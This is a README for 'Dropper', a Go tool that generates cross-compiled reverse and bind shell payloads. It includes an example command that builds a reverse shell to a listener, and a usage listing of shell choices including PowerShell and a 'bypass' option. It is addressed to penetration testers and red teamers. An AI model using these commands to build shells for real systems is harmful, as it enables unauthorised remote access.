HEY! The current installment of Dropper 2.0 can be found here: https://github.com/im4x5yn74x/dropper2
Dropper
Cross compiling reverse/bind payload generator written in Go.
In order to run dropper, you must already have your GOPATH configured properly. For more information on setting up your GOPATH and Golang environment, please visit the golang wiki on GitHub:
https://github.com/golang/go/wiki/SettingGOPATH
If everything is all set, navigate to your GOPATH on your system run clone the repo using git
or go
.
git clone https://github.com/im4x5yn74x/dropper.git
go get github.com/im4x5yn74x/dropper
Once cloned, change to the dropper folder and give it a test run.
cd dropper/;
go run dropper.go
+...|Choose an OS|...+
- windows
- linux
- freebsd
- nacl
- netbsd
- openbsd
- plan9
- solaris
- dragonfly
- darwin
- android
>_:
Feel free to compile it and provide arguments to quickly build your payloads.
go build dropper.go
./dropper -a 386 -o potato -p linux -l 127.0.0.1:1337 -s /bin/sh -t reverse
./dropper -h
Usage of ./dropper: -a string Architecture: 386, amd64, amd64p32, arm, arm64, ppc64, ppc64le, mips, mipsle, mips64, mips64le, s390x, sparc64 -l string Listening host: -o string Output filename: -p string Operating System: windows, linux, freebsd, nacl, netbsd, openbsd, plan9, solaris, dragonfly, darwin, android -s string Shell type: C:\Windows\System32\cmd.exe, C:\Windows\SYSWOW64\WindowsPowerShell\v1.0\powershell.exe, /bin/sh, /system/bin/sh, /bin/busybox, bypass -t string Payload type: bind/reverseThis tool is intended for Penetration Testers, Security Researchers and Red Teamers alike. DO NOT USE this tool for ILLEGAL purposes or WITHOUT the CONSENT from the parties involved while agreed upon by LEGAL DOCUMENTATION or PERMISSIVE ACCESS for security consultation or research purposes. I, hereby relinquish ALL responsiblity for any illegal use of this tool or ANY binary payloads subsequently generated by the tool as discribed. You have been warned.